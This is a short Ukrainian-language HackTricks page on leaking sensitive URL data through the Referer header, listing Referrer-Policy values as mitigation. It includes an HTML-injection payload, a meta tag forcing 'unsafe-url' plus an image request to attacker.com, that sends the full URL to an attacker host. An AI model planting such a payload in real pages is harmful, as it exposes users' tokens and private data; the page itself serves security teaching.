3.3 KiB
{% hint style="success" %}
Вивчайте та практикуйте взлом AWS: Навчання HackTricks AWS Red Team Expert (ARTE)
Вивчайте та практикуйте взлом GCP: Навчання HackTricks GCP Red Team Expert (GRTE)
Підтримайте HackTricks
- Перевірте плани підписки!
- Приєднуйтесь до 💬 групи Discord або групи Telegram або слідкуйте за нами на Twitter 🐦 @hacktricks_live.
- Поширюйте хакерські трюки, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на GitHub.
Заголовки реферерів та політика
Реферер - це заголовок, який використовується браузерами для вказівки на те, яка була попередня відвідана сторінка.
Витік чутливої інформації
Якщо на веб-сторінці в якийсь момент розташована будь-яка чутлива інформація в параметрах запиту GET, якщо сторінка містить посилання на зовнішні джерела або зловмисник може змусити/запропонувати (соціальний інжиніринг) користувачеві відвідати URL, керований зловмисником. Це може дозволити витягти чутливу інформацію в останньому запиті GET.
Пом'якшення
Ви можете змусити браузер дотримуватися політики реферера, яка може запобігти відправці чутливої інформації іншим веб-додаткам:
Referrer-Policy: no-referrer
Referrer-Policy: no-referrer-when-downgrade
Referrer-Policy: origin
Referrer-Policy: origin-when-cross-origin
Referrer-Policy: same-origin
Referrer-Policy: strict-origin
Referrer-Policy: strict-origin-when-cross-origin
Referrer-Policy: unsafe-url
Протидія-заходи
Ви можете перевизначити це правило, використовуючи HTML мета-тег (зловмисник повинен використовувати HTML ін'єкцію):
<meta name="referrer" content="unsafe-url">
<img src="https://attacker.com">
Захист
Ніколи не вставляйте жодних чутливих даних у параметри GET або шляхи в URL-адресі.